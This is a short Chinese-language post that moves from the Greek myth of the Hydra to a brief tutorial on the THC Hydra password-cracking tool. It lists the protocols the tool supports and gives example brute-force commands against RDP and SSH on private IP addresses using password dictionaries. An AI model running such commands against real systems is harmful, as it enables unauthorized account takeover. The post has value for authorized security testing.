Hydra(九頭蛇海德拉)是希臘神話之中的一個怪獸,以九個頭聞名於世。 擁有九顆頭,其中一顆頭要是被斬斷,立刻又會生出兩顆頭來。赫克力士運用他的智慧,成功地擊敗了巨大水蛇海德拉。它是西方神話中的生物,在古希臘神話中出現最為頻繁,但《波斯古經》、《聖經》、非洲傳說、中國神話里也可以看到其變體和影子。
hydra是黑客組織thc的一款開源密碼攻擊工具,功能十分強大,支持多種協議的破解,點擊運行終端執行hydra -h可以看到詳細介紹Supported services: asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get}http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
其中rdp就是遠程桌面協議
hydra 192.168.1.12 rdp -L users.txt -P pass.txt -V 192.168.12是目標服務器的IP地址 rdp 是協議 -L 指定一個帳號字典 -P 指定一個密碼字典 -V 現實爆破測試的詳細過程
破解ssh
hydra -l root -P passwoed.txt -t 6 ssh://172.25.0.11 -V
hydra好像從8.0以后就沒有windows版了,不過今天總算找了個8.1版本的,windows版hydra 提取碼:qxvd